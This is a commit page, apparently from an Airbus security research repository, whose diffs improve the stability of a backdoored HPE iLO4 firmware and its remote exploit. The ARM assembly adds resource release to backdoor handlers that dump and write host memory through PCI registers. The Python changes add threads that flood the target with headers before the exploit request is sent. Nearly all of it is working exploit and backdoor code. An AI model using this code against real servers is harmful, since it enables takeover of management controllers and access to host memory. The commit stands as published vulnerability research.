- Fix stability issues in the backdoored firmware

- Make exploits great again! Stability++
airbus-seclab · Dec 19, 2018 · a3e4b31 · a3e4b31
1 parent b73d245
commit a3e4b31
Show file tree

Hide file tree

Showing 3 changed files with 104 additions and 34 deletions.
diff --git a/scripts/iLO4/GET_handler.S b/scripts/iLO4/GET_handler.S
@@ -11,8 +11,8 @@ start:
 	MOV		R0, SP
 	BL		bzero
 
-        MOV     	R0, #8
-        BL     		memmap
+	MOV     	R0, #8
+	BL     		memmap
 
 	MOV		R0, R7
 	LDR		R10, get_query_string
@@ -21,7 +21,7 @@ start:
 	CMP             R0, #0
 	BEQ		error_400
 
-	MOV		R2, #0x100
+	MOV		R2, #0x1000
 	MOV		R1, R0
 	BL		get_storage
 	ADD		R0, R0, #0x2000
@@ -463,6 +463,8 @@ check_wmem_size:
 	LDR		R1, [SP, #0xF0]
 	CMP		R1, #0
 	BEQ		err_wmem
+	CMP     R1, #0xffffffff
+	BEQ		err_wmem
 
 do_wmem:
 	LDR		R3, [SP, #0xF0]
@@ -553,24 +555,24 @@ dmp_host:
 	MOV		R0, R6
 	BL		go_200_headers
 
-        LDR     	R0, [SP, #0x10]
-        MOV     	R2, #0
-        MOV     	R1, R2
-        BL	     	WaitForSemaphore
+	LDR     	R0, [SP, #0x10]
+	MOV     	R2, #0
+	MOV     	R1, R2
+	BL	     	WaitForSemaphore
 
-        MOV     	R0, #2
-        STR     	R0, [SP, #0x14]
+	MOV     	R0, #2
+	STR     	R0, [SP, #0x14]
 
 dmp_host_loop:
 	MOV     	R3, R8, LSL #8
-        ORR     	R2, R3, R7, LSR #24
-        LDRB    	R3, [SP, #0x14]
+	ORR     	R2, R3, R7, LSR #24
+	LDRB    	R3, [SP, #0x14]
 	BIC     	R2, R2, #0xFF000000
-        ORR     	R2, R2, R3, LSL #24
-        BL		get_pcireg
-        STR     	R2, [R0]
-        BIC     	R2, R7, #0xFF000000
-        ADD     	R0, R2, #0x81000000
+	ORR     	R2, R2, R3, LSL #24
+	BL		get_pcireg
+	STR     	R2, [R0]
+	BIC     	R2, R7, #0xFF000000
+	ADD     	R0, R2, #0x81000000
 
 	STR		R0, [SP, #0xC]
 
@@ -595,8 +597,14 @@ dmp_host_loop:
 	B 		dmp_host_loop
 
 dmp_host_end:
-        LDR     	R0, [SP, #0x10]
-        BL     		ReleaseSemaphore
+	LDR     	R0, [SP, #0x10]
+	BL     		ReleaseSemaphore
+
+	LDR     	R0, [SP, #0x10]
+	BL     		ReleaseResource
+
+	LDR     	R0, [SP]
+	BL     		ReleaseResource
 
 	MOV		R0, R6
 	BL		go_200_close
@@ -637,23 +645,23 @@ wmem_host:
 	ADD 		R0, SP, #0x10
 	BL 		RequestResource
 
-        LDR     	R0, [SP, #0x10]
-        MOV     	R2, #0
-        MOV     	R1, R2
-        BL	     	WaitForSemaphore
+	LDR     	R0, [SP, #0x10]
+	MOV     	R2, #0
+	MOV     	R1, R2
+	BL	     	WaitForSemaphore
 
-        MOV     	R0, #2
-        STR     	R0, [SP, #0x14]
+	MOV     	R0, #2
+	STR     	R0, [SP, #0x14]
 
 	MOV     	R3, R8, LSL #8
-        ORR     	R2, R3, R7, LSR #24
-        LDRB    	R3, [SP, #0x14]
+	ORR     	R2, R3, R7, LSR #24
+	LDRB    	R3, [SP, #0x14]
 	BIC     	R2, R2, #0xFF000000
-        ORR     	R2, R2, R3, LSL #24
-        BL		get_pcireg
-        STR     	R2, [R0]
-        BIC     	R2, R7, #0xFF000000
-        ADD     	R0, R2, #0x81000000
+	ORR     	R2, R2, R3, LSL #24
+	BL		get_pcireg
+	STR     	R2, [R0]
+	BIC     	R2, R7, #0xFF000000
+	ADD     	R0, R2, #0x81000000
 
 	STR		R0, [SP, #0xC]
 
@@ -665,7 +673,13 @@ wmem_host:
 	BL 		CopyToMemoryRegion
 
 	LDR     	R0, [SP, #0x10]
-        BL     		ReleaseSemaphore
+	BL     		ReleaseSemaphore
+
+	LDR     	R0, [SP, #0x10]
+	BL     		ReleaseResource
+
+	LDR     	R0, [SP]
+	BL     		ReleaseResource
 
 	MOV		R0, R6
 	BL		go_200_headers
@@ -710,6 +724,11 @@ RequestResource:
 	BX 		R10
 RequestResource_fn: 	.word 0x17A3948
 
+ReleaseResource:
+	LDR		R10, ReleaseResource_fn
+	BX 		R10
+ReleaseResource_fn: 	.word 0x17808FC
+
 WaitForSemaphore:	
 	LDR		R10, WaitForSemaphore_fn
 	BX 		R10

diff --git a/scripts/iLO4/exploits/exploit_check_flash.py b/scripts/iLO4/exploits/exploit_check_flash.py
@@ -78,7 +78,9 @@
 if version != ilo_version.replace(".",""):
     print "[-] Bad version specified in command line"
 
+ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers)
 send_exploit(s, sc_headers + cookies_headers + vtable_headers, o)
+stop_threads(ths)
 
 btmp = ""
 out = ""

diff --git a/scripts/iLO4/exploits/exploit_helpers.py b/scripts/iLO4/exploits/exploit_helpers.py
@@ -8,6 +8,9 @@
 from keystone import *
 from exploit_offsets import *
 
+import threading
+from time import sleep
+
 sc_offset = 0x1000
 vtable_offset = 0x100
 
@@ -27,11 +30,11 @@ def get_version_info(version):
     return EXP_OFFSETS[version]
 
 def ssl_connector(addr, port):
-    print "[*] Connecting to %s..." % sys.argv[1]
+    print "[*] Connecting to %s..." % addr
 
     sraw = socket.socket()
     s = ssl.wrap_socket(sraw)
-    s.connect((sys.argv[1], 443))
+    s.connect((addr, port))
 
     print "[+] Connected"
     return s
@@ -122,6 +125,52 @@ def get_xml_version(s, headers):
     print "[*] Found iLO version %s" % ilo_version
     return ilo_version
 
+def fill_threads(host, headers):
+    th = []
+    for i in xrange(3):
+        th.append(fillingThread(host, headers))
+    for i in xrange(3):
+        th[i].start()
+    while not all(th[i].sentflag for i in xrange(3)):
+        sleep(0.1)
+    return th
+
+def stop_threads(ths):
+    for th in ths:
+        th.stop()
+
+class fillingThread(threading.Thread):
+    def __init__(self, host, headers): 
+        threading.Thread.__init__(self)
+        self.stopflag = False
+        try:
+            self.s = ssl_connector(host, 443)
+        except:
+            self.s = None
+        self.headers = headers
+        self.sentflag = False
+
+    def run(self):
+        if self.s is None:
+            return
+        print "[*] Filling buffer..."
+
+        self.buf  = "GET / HTTP/1.1\r\n"
+        self.buf += "Host: ilo\r\n"
+
+        self.buf += self.headers
+
+        self.s.send(self.buf)
+        self.sentflag = True
+
+        while not self.stopflag:
+            sleep(0.1)
+        print "[+] Releasing threads"
+        self.s.close()
+
+    def stop(self):
+        self.stopflag = True
+
 def send_exploit(s, headers, o):
     print "[*] Preparing request 2..."